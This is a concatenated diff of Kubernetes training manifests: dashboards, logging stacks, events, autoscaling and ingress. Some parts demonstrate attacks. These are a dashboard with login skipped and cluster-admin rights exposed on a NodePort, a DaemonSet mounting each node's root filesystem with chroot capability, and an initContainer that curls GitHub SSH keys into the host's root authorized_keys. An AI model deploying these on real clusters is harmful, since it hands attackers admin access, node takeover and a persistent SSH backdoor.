app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-key-holder
- kubernetes-dashboard-certs
- kubernetes-dashboard-csrf
resources:
- secrets
verbs:
- get
- update
- delete
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-settings
resources:
- configmaps
verbs:
- get
- update
- apiGroups:
- ""
resourceNames:
- heapster
- dashboard-metrics-scraper
resources:
- services
verbs:
- proxy
- apiGroups:
- ""
resourceNames:
- heapster
- 'http:heapster:'
- 'https:heapster:'
- dashboard-metrics-scraper
- http:dashboard-metrics-scraper
resources:
- services/proxy
verbs:
- get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Service
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- name: http
port: 443
targetPort: http
selector:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --sidecar-host=http://127.0.0.1:8000
- --enable-skip-login
- --enable-insecure-login
image: kubernetesui/dashboard:v2.7.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 9090
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: kubernetes-dashboard
ports:
- containerPort: 9090
name: http
protocol: TCP
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /certs
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: dashboard-metrics-scraper
ports:
- containerPort: 8000
protocol: TCP
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- emptyDir: {}
name: tmp-volume
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
creationTimestamp: null
name: kubernetes-dashboard:insecure
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard


@@ -1,325 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
apiVersion: v1
kind: ServiceAccount
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
data: null
kind: ConfigMap
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-key-holder
- kubernetes-dashboard-certs
- kubernetes-dashboard-csrf
resources:
- secrets
verbs:
- get
- update
- delete
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-settings
resources:
- configmaps
verbs:
- get
- update
- apiGroups:
- ""
resourceNames:
- heapster
- dashboard-metrics-scraper
resources:
- services
verbs:
- proxy
- apiGroups:
- ""
resourceNames:
- heapster
- 'http:heapster:'
- 'https:heapster:'
- dashboard-metrics-scraper
- http:dashboard-metrics-scraper
resources:
- services/proxy
verbs:
- get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Service
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- name: https
port: 443
targetPort: https
selector:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --sidecar-host=http://127.0.0.1:8000
image: kubernetesui/dashboard:v2.7.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8443
scheme: HTTPS
initialDelaySeconds: 30
timeoutSeconds: 30
name: kubernetes-dashboard
ports:
- containerPort: 8443
name: https
protocol: TCP
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /certs
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: dashboard-metrics-scraper
ports:
- containerPort: 8000
protocol: TCP
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- emptyDir: {}
name: tmp-volume


@@ -1,355 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
apiVersion: v1
kind: ServiceAccount
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
data: null
kind: ConfigMap
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-key-holder
- kubernetes-dashboard-certs
- kubernetes-dashboard-csrf
resources:
- secrets
verbs:
- get
- update
- delete
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-settings
resources:
- configmaps
verbs:
- get
- update
- apiGroups:
- ""
resourceNames:
- heapster
- dashboard-metrics-scraper
resources:
- services
verbs:
- proxy
- apiGroups:
- ""
resourceNames:
- heapster
- 'http:heapster:'
- 'https:heapster:'
- dashboard-metrics-scraper
- http:dashboard-metrics-scraper
resources:
- services/proxy
verbs:
- get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Service
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- name: https
port: 443
targetPort: https
selector:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --sidecar-host=http://127.0.0.1:8000
image: kubernetesui/dashboard:v2.7.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8443
scheme: HTTPS
initialDelaySeconds: 30
timeoutSeconds: 30
name: kubernetes-dashboard
ports:
- containerPort: 8443
name: https
protocol: TCP
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /certs
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: dashboard-metrics-scraper
ports:
- containerPort: 8000
protocol: TCP
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- emptyDir: {}
name: tmp-volume
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
creationTimestamp: null
name: kubernetes-dashboard:cluster-admin
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: cluster-admin
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: ServiceAccount
metadata:
creationTimestamp: null
name: cluster-admin
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
type: kubernetes.io/service-account-token
metadata:
name: cluster-admin-token
namespace: kubernetes-dashboard
annotations:
kubernetes.io/service-account.name: cluster-admin


@@ -5,7 +5,7 @@ metadata:
name: fluentd
namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: fluentd
@@ -21,7 +21,7 @@ rules:
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: fluentd
roleRef:


@@ -11,7 +11,7 @@ metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: elasticsearch-operator
@@ -41,7 +41,7 @@ rules:
resources: ["elasticsearchclusters"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: elasticsearch-operator
@@ -55,16 +55,13 @@ subjects:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: apps/v1
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
spec:
replicas: 1
selector:
matchLabels:
name: elasticsearch-operator
template:
metadata:
labels:


@@ -1,30 +0,0 @@
kind: Event
apiVersion: v1
metadata:
generateName: hello-
labels:
container.training/test: ""
#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42
involvedObject:
kind: Node
apiVersion: v1
name: kind-control-plane
# Note: the uid should be the Node name (not the uid of the Node).
# This might be specific to global objects.
uid: kind-control-plane
type: Warning
reason: NodeOverheat
message: "Node temperature exceeds critical threshold"
action: Hello
source:
component: thermal-probe
#host: node1
#reportingComponent: ""
#reportingInstance: ""


@@ -1,36 +0,0 @@
kind: Event
apiVersion: v1
metadata:
# One convention is to use <objectname>.<timestamp>,
# where the timestamp is taken with a nanosecond
# precision and expressed in hexadecimal.
# Example: web-5dcb957ccc-fjvzc.164689730a36ec3d
name: hello.1234567890
# The label doesn't serve any purpose, except making
# it easier to identify or delete that specific event.
labels:
container.training/test: ""
#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42
involvedObject:
### These 5 lines should be updated to refer to an object.
### Make sure to put the correct "uid", because it is what
### "kubectl describe" is using to gather relevant events.
#apiVersion: v1
#kind: Pod
#name: magic-bean
#namespace: blue
#uid: 7f28fda8-6ef4-4580-8d87-b55721fcfc30
type: Normal
reason: BackupSuccessful
message: "Object successfully dumped to gitops repository"
source:
component: gitops-sync
#reportingComponent: ""
#reportingInstance: ""
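
The naming convention described in the comment above (<objectname>.<timestamp>, with the timestamp in nanoseconds and rendered in hexadecimal) can be reproduced with a one-liner; a sketch assuming GNU date:

    # Produces a name in the same form as the example
    # web-5dcb957ccc-fjvzc.164689730a36ec3d quoted in the comment.
    printf '%s.%x\n' "web-5dcb957ccc-fjvzc" "$(date +%s%N)"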


@@ -52,7 +52,7 @@ data:
- add_kubernetes_metadata:
in_cluster: true
---
apiVersion: apps/v1
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: filebeat
@@ -60,9 +60,6 @@ metadata:
labels:
k8s-app: filebeat
spec:
selector:
matchLabels:
k8s-app: filebeat
template:
metadata:
labels:
@@ -131,7 +128,7 @@ spec:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: filebeat
@@ -144,7 +141,7 @@ roleRef:
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: filebeat


@@ -1,4 +1,4 @@
apiVersion: rbac.authorization.k8s.io/v1
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
@@ -11,4 +11,4 @@ roleRef:
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
namespace: kube-system


@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hackthecluster
spec:
selector:
matchLabels:
app: hackthecluster
template:
metadata:
labels:
app: hackthecluster
spec:
volumes:
- name: slash
hostPath:
path: /
tolerations:
- effect: NoSchedule
operator: Exists
containers:
- name: alpine
image: alpine
volumeMounts:
- name: slash
mountPath: /hostfs
command:
- sleep
- infinity
securityContext:
#privileged: true
capabilities:
add:
- SYS_CHROOT
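
The DaemonSet above mounts each node's root filesystem at /hostfs and adds the SYS_CHROOT capability, so a shell on the node can be obtained through any of its pods; a usage sketch (the pod name is hypothetical):

    # Find one of the DaemonSet's pods, then chroot into the node's filesystem.
    kubectl get pods -l app=hackthecluster -o wide
    kubectl exec -it hackthecluster-xxxxx -- chroot /hostfs sh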


@@ -16,7 +16,8 @@ spec:
hostPath:
path: /root
tolerations:
- operator: Exists
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
@@ -26,7 +27,7 @@ spec:
command:
- sh
- -c
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys >> /root/.ssh/authorized_keys"
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx


@@ -1,16 +1,18 @@
global
daemon
maxconn 256
defaults
mode tcp
timeout connect 5s
timeout client 50s
timeout server 50s
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
listen very-basic-load-balancer
frontend the-frontend
bind *:80
server blue color.blue.svc:80
server green color.green.svc:80
default_backend the-backend
backend the-backend
server google.com-80 google.com:80 maxconn 32 check
server ibm.fr-80 ibm.fr:80 maxconn 32 check
### Note: the services above must exist,
### otherwise HAproxy won't start.


@@ -1,29 +0,0 @@
kind: HorizontalPodAutoscaler
apiVersion: autoscaling/v2
metadata:
name: rng
spec:
scaleTargetRef:
apiVersion: apps/v1
kind: Deployment
name: rng
minReplicas: 1
maxReplicas: 20
behavior:
scaleUp:
stabilizationWindowSeconds: 60
scaleDown:
stabilizationWindowSeconds: 180
metrics:
- type: Object
object:
describedObject:
apiVersion: v1
kind: Service
name: httplat
metric:
name: httplat_latency_seconds
target:
type: Value
value: 0.1
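
Once the autoscaler above is created, its decisions on the rng Deployment can be observed with standard commands; a quick sketch:

    # Current vs. target value of httplat_latency_seconds, plus scaling events.
    kubectl get hpa rng --watch
    kubectl describe hpa rng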


@@ -1,20 +0,0 @@
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: whatever
spec:
#tls:
#- secretName: whatever.A.B.C.D.nip.io
# hosts:
# - whatever.A.B.C.D.nip.io
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: whatever
port:
number: 1234


@@ -1,17 +0,0 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
spec:
#tls:
#- secretName: whatever.A.B.C.D.nip.io
# hosts:
# - whatever.A.B.C.D.nip.io
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 1234


@@ -1 +0,0 @@
ingress-v1beta1.yaml

k8s/ingress.yaml (new file): 13 lines added

@@ -0,0 +1,13 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: whatever
spec:
rules:
- host: whatever.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: whatever
servicePort: 1234

k8s/insecure-dashboard.yaml (new file): 360 lines added

@@ -0,0 +1,360 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
apiVersion: v1
kind: Namespace
metadata:
name: kubernetes-dashboard
---
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
data:
csrf: ""
---
